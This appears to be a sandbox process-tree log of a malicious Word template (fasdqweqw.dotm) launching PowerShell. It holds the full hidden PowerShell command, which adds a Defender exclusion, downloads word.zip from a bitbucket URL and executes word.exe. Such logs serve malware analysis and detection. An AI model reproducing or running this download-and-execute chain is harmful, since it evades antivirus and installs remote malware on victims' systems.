WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\fasdqweqw.dotm (PID 1212)
powershell.exe powershell.exe -e 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 (PID 2224)
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPath 'C:\Temp\';(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/x98989/8678678ff/downloads/word.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C:\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process cmd.exe -ArgumentList '/c C:\\Temp\\word.exe'" (PID 2376)
cmd.exe "C:\Windows\system32\cmd.exe" /c C:\\Temp\\word.exe (PID 2548)